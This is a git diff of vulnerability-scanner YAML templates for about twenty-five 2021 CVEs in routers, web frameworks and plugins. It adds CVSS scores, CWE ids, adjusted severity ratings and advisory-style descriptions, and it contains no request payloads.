a/cves/2021/CVE-2021-32030.yaml b/cves/2021/CVE-2021-32030.yaml index 47b367c664..5918a5c871 100644 --- a/cves/2021/CVE-2021-32030.yaml +++ b/cves/2021/CVE-2021-32030.yaml @@ -3,10 +3,15 @@ id: CVE-2021-32030 info: name: ASUS GT-AC2900 - Authentication Bypass author: gy741 - severity: high + severity: critical description: The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. reference: https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass tags: cve,cve2021,asus,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32030 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-3223.yaml b/cves/2021/CVE-2021-3223.yaml index 801dd5b095..31a095515f 100644 --- a/cves/2021/CVE-2021-3223.yaml +++ b/cves/2021/CVE-2021-3223.yaml @@ -9,6 +9,11 @@ info: - https://github.com/node-red/node-red-dashboard/issues/669 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223 tags: cve,cve2020,node-red-dashboard,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-3223 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-32305.yaml b/cves/2021/CVE-2021-32305.yaml index 70f2fb7787..c85b8eac3a 100644 --- a/cves/2021/CVE-2021-32305.yaml +++ b/cves/2021/CVE-2021-32305.yaml @@ -9,6 +9,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-32305 - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html tags: cve,cve2021,websvn,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-32305 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-32819.yaml b/cves/2021/CVE-2021-32819.yaml index 3b08cefdd4..455e65993d 100644 --- a/cves/2021/CVE-2021-32819.yaml +++ b/cves/2021/CVE-2021-32819.yaml @@ -3,7 +3,7 @@ id: CVE-2021-32819 info: name: Nodejs squirrelly template engine RCE author: pikpikcu - severity: critical + severity: high description: | Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is @@ -13,6 +13,10 @@ info: - https://www.linuxlz.com/aqld/2331.html - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023 tags: cve,cve2021,nodejs,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2021-32819 requests: - method: GET diff --git a/cves/2021/CVE-2021-32820.yaml b/cves/2021/CVE-2021-32820.yaml index 3c91c1e2a2..99daa3b409 100644 --- a/cves/2021/CVE-2021-32820.yaml +++ b/cves/2021/CVE-2021-32820.yaml @@ -3,11 +3,17 @@ id: CVE-2021-32820 info: name: Express-handlebars Path Traversal author: dhiyaneshDk - severity: medium + severity: high reference: - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json tags: cve,cve2021,expressjs,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N + cvss-score: 8.60 + cve-id: CVE-2021-32820 + cwe-id: CWE-200 + description: "Express-handlebars is a Handlebars view engine for Express. Express-handlebars mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extentions (i.e. file.extension) can be included, files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability." requests: - method: GET diff --git a/cves/2021/CVE-2021-3297.yaml b/cves/2021/CVE-2021-3297.yaml index ae2f69e33a..801f92c40d 100644 --- a/cves/2021/CVE-2021-3297.yaml +++ b/cves/2021/CVE-2021-3297.yaml @@ -8,6 +8,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-3297 - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass tags: cve,cve2021,zyxel,auth-bypass,router + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.80 + cve-id: CVE-2021-3297 + cwe-id: CWE-287 requests: - raw: diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index b64016ff6a..9b713950a9 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml @@ -5,8 +5,13 @@ info: author: geeknik description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf - severity: medium + severity: critical tags: cve,cve2021,commscope,ruckus,debug + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33221 + cwe-id: CWE-306 requests: - method: GET diff --git a/cves/2021/CVE-2021-33564.yaml b/cves/2021/CVE-2021-33564.yaml index a2bbd5d431..b6b1e0781e 100644 --- a/cves/2021/CVE-2021-33564.yaml +++ b/cves/2021/CVE-2021-33564.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://zxsecurity.co.nz/research/argunment-injection-ruby-dragonfly/ tags: cve,cve2021,rce,ruby + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33564 + cwe-id: CWE-88 + description: "An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility." requests: - method: GET diff --git a/cves/2021/CVE-2021-3374.yaml b/cves/2021/CVE-2021-3374.yaml index a337b419ae..8446f3f830 100644 --- a/cves/2021/CVE-2021-3374.yaml +++ b/cves/2021/CVE-2021-3374.yaml @@ -7,6 +7,11 @@ info: reference: https://github.com/colemanjp/rstudio-shiny-server-directory-traversal-source-code-leak severity: medium tags: cve,cve2021,rstudio,traversal + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-3374 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-3377.yaml b/cves/2021/CVE-2021-3377.yaml index 1b44686e3e..58c38c5802 100644 --- a/cves/2021/CVE-2021-3377.yaml +++ b/cves/2021/CVE-2021-3377.yaml @@ -9,6 +9,11 @@ info: author: geeknik severity: medium tags: cve,cve2021,xss,npm + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-3377 + cwe-id: CWE-79 requests: - raw: diff --git a/cves/2021/CVE-2021-3378.yaml b/cves/2021/CVE-2021-3378.yaml index f39c826555..80215a832b 100644 --- a/cves/2021/CVE-2021-3378.yaml +++ b/cves/2021/CVE-2021-3378.yaml @@ -10,6 +10,11 @@ info: via insecure POST request. It has been tested on version 4.4.2.2 in Windows 10 Enterprise. tags: cve,cve2021,fortilogger,fortigate,fortinet + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-3378 + cwe-id: CWE-434 requests: - raw: diff --git a/cves/2021/CVE-2021-33807.yaml b/cves/2021/CVE-2021-33807.yaml index 7ffb782090..4cee9b0a73 100644 --- a/cves/2021/CVE-2021-33807.yaml +++ b/cves/2021/CVE-2021-33807.yaml @@ -9,6 +9,11 @@ info: - https://www.on-x.com/sites/default/files/on-x_-_security_advisory_-_gespage_-_cve-2021-33807.pdf - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33807 tags: cve,cve2021,lfi + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2021-33807 + cwe-id: CWE-22 requests: - method: GET diff --git a/cves/2021/CVE-2021-33904.yaml b/cves/2021/CVE-2021-33904.yaml index cdb7130cd7..1e62c84265 100644 --- a/cves/2021/CVE-2021-33904.yaml +++ b/cves/2021/CVE-2021-33904.yaml @@ -7,6 +7,11 @@ info: reference: https://www.exploit-db.com/exploits/49980 severity: medium tags: cve,cve2021,accela,xss + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-33904 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34370.yaml b/cves/2021/CVE-2021-34370.yaml index a920b1c540..0e34c5c406 100644 --- a/cves/2021/CVE-2021-34370.yaml +++ b/cves/2021/CVE-2021-34370.yaml @@ -10,6 +10,11 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-34370 - https://www.accela.com/civic-platform/ tags: xss,redirect,cve,cve2021 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-34370 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-34429.yaml b/cves/2021/CVE-2021-34429.yaml index 726f1cffae..fa1c651a3a 100644 --- a/cves/2021/CVE-2021-34429.yaml +++ b/cves/2021/CVE-2021-34429.yaml @@ -9,6 +9,11 @@ info: reference: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-vjv5-gp2w-65vm tags: cve,cve2021,jetty + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2021-34429 + cwe-id: CWE-200 requests: - raw: diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index 5a10ae6168..68a4fd2b38 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -11,6 +11,10 @@ info: - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34473 requests: - method: GET diff --git a/cves/2021/CVE-2021-34621.yaml b/cves/2021/CVE-2021-34621.yaml index 9a97a4f4e5..4362823530 100644 --- a/cves/2021/CVE-2021-34621.yaml +++ b/cves/2021/CVE-2021-34621.yaml @@ -6,6 +6,12 @@ info: severity: critical reference: https://www.wordfence.com/blog/2021/06/easily-exploitable-critical-vulnerabilities-patched-in-profilepress-plugin tags: cve,cve2021,wordpress,wp-plugin + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-34621 + cwe-id: CWE-269 + description: "A vulnerability in the user registration component found in the ~/src/Classes/RegistrationAuth.php file of the ProfilePress WordPress plugin made it possible for users to register on sites as an administrator. This issue affects versions 3.0.0 - 3.1.3. ." requests: - raw: diff --git a/cves/2021/CVE-2021-35464.yaml b/cves/2021/CVE-2021-35464.yaml index f3e3f41ee9..a7800fd3ac 100644 --- a/cves/2021/CVE-2021-35464.yaml +++ b/cves/2021/CVE-2021-35464.yaml @@ -12,6 +12,11 @@ info: tags: cve,cve2021,openam,rce,java reference: - https://portswigger.net/research/pre-auth-rce-in-forgerock-openam-cve-2021-35464 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-35464 + cwe-id: CWE-502 requests: - method: GET diff --git a/cves/2021/CVE-2021-36380.yaml b/cves/2021/CVE-2021-36380.yaml index 7030f465af..afdeff9e10 100644 --- a/cves/2021/CVE-2021-36380.yaml +++ b/cves/2021/CVE-2021-36380.yaml @@ -8,6 +8,11 @@ info: reference: - https://research.nccgroup.com/2021/07/26/technical-advisory-sunhillo-sureline-unauthenticated-os-command-injection-cve-2021-36380/ tags: cve,cve2021,sureline,rce,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-36380 + cwe-id: CWE-78 requests: - raw: diff --git a/cves/2021/CVE-2021-37216.yaml b/cves/2021/CVE-2021-37216.yaml index 33de2b4095..de96cad6d0 100644 --- a/cves/2021/CVE-2021-37216.yaml +++ b/cves/2021/CVE-2021-37216.yaml @@ -10,6 +10,11 @@ info: reference: https://www.twcert.org.tw/tw/cp-132-4962-44cd2-1.html severity: medium tags: cve,cve2021,xss,qsan + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37216 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-37538.yaml b/cves/2021/CVE-2021-37538.yaml index 758e66491c..c7327b670e 100644 --- a/cves/2021/CVE-2021-37538.yaml +++ b/cves/2021/CVE-2021-37538.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37538 info: name: PrestaShop SmartBlog SQL Injection author: whoever - severity: high + severity: critical description: PrestaShop SmartBlog by SmartDataSoft < 4.0.6 is vulnerable to a SQL injection in the blog archive functionality. tags: cve,cve2021,prestashop,smartblog,sqli reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37538 - https://blog.sorcery.ie/posts/smartblog_sqli/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-37538 + cwe-id: CWE-89 requests: - method: GET diff --git a/cves/2021/CVE-2021-37573.yaml b/cves/2021/CVE-2021-37573.yaml index 6c9c42fe15..aa50dba941 100644 --- a/cves/2021/CVE-2021-37573.yaml +++ b/cves/2021/CVE-2021-37573.yaml @@ -7,6 +7,12 @@ info: reference: - https://seclists.org/fulldisclosure/2021/Aug/13 tags: cve,cve2021,xss,tjws + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-37573 + cwe-id: CWE-79 + description: "A reflected cross-site scripting (XSS) vulnerability in the web server TTiny Java Web Server and Servlet Container (TJWS) <=1.115 allows an adversary to inject malicious code on the server's \"404 Page not Found\" error page" requests: - method: GET diff --git a/cves/2021/CVE-2021-37704.yaml b/cves/2021/CVE-2021-37704.yaml index f9424b16b2..cefb540971 100644 --- a/cves/2021/CVE-2021-37704.yaml +++ b/cves/2021/CVE-2021-37704.yaml @@ -3,12 +3,17 @@ id: CVE-2021-37704 info: name: phpfastcache phpinfo exposure author: whoever - severity: low + severity: medium description: phpinfo() exposure in unprotected composer vendor folder via phpfastcache/phpfastcache. tags: cve,cve2021,exposure,phpfastcache reference: https://github.com/PHPSocialNetwork/phpfastcache/pull/813 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37704 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N + cvss-score: 4.30 + cve-id: CVE-2021-37704 + cwe-id: CWE-668 requests: - method: GET diff --git a/cves/2021/CVE-2021-38702.yaml b/cves/2021/CVE-2021-38702.yaml index c17a52845f..cf51a9d3b3 100644 --- a/cves/2021/CVE-2021-38702.yaml +++ b/cves/2021/CVE-2021-38702.yaml @@ -7,6 +7,11 @@ info: description: Cyberoam NetGenie C0101B1-20141120-NG11VO devices through 2021-08-14 allow for reflected Cross Site Scripting via the 'u' parameter of ft.php. reference: https://seclists.org/fulldisclosure/2021/Aug/20 tags: cve,cve2021,cyberoam,netgenie,xss,router + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2021-38702 + cwe-id: CWE-79 requests: - method: GET diff --git a/cves/2021/CVE-2021-38751.yaml b/cves/2021/CVE-2021-38751.yaml index 209200dcb3..f65c7095ad 100644 --- a/cves/2021/CVE-2021-38751.yaml +++ b/cves/2021/CVE-2021-38751.yaml @@ -13,6 +13,11 @@ info: - https://github.com/exponentcms/exponent-cms/issues/1544 - https://github.com/exponentcms/exponent-cms/blob/a9fa9358c5e8dc2ce7ad61d7d5bea38505b8515c/exponent_constants.php#L56-L64 tags: cve,cve2021,exponentcms + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.30 + cve-id: CVE-2021-38751 + cwe-id: CWE-116 requests: - method: GET